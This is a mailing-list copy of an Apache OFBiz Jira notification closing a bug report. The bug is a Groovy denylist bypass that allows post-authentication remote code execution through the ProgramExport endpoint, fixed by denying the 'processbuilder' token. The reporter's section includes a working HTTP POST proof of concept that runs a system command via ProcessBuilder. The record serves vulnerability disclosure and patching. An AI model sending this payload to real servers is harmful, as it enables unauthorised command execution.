You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@ofbiz.apache.org by "Jacques Le Roux (Jira)" <ji...@apache.org> on 2022/02/10 13:25:00 UTC

[jira] [Closed] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

     [ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux closed OFBIZ-12571.
-----------------------------------
    Fix Version/s: 18.12.06
                   22.01.01
       Resolution: Fixed

This has been fixed simply by adding processbuilder to deniedWebShellTokens in security.properties file

> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)